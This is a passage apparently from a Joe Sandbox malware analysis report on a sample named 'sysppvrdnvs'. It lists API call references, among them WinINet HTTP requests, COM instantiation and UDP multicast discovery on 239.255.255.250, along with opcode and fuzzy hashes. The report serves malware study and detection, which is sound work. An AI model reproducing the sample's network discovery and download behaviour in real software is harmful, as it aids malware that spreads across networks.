  • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
• SysFreeString.OLEAUT32(00000000), ref: 004075F8
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CreateFreeInstanceString
• String ID: Microsoft Corporation
• API String ID: 586785272-3838278685
• Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
• Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
• Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
• Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
APIs
  • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
  • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
  • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
  • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
  • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
  • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
  • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
  • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
  • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
  • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
  • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
• SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
• SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
• String ID: %S%S
• API String ID: 1017111014-3267608656
• Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
• Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
• Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
• Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
  • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
  • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
  • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
  • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
  • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
  • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
  • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
  • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
  • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
  • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
• String ID: TCP$UDP
• API String ID: 1519345861-1097902612
• Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
• Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
• Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
• Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
APIs
• EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
• LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CriticalSectionmemcpy$EnterLeave
• String ID:
• API String ID: 469056452-0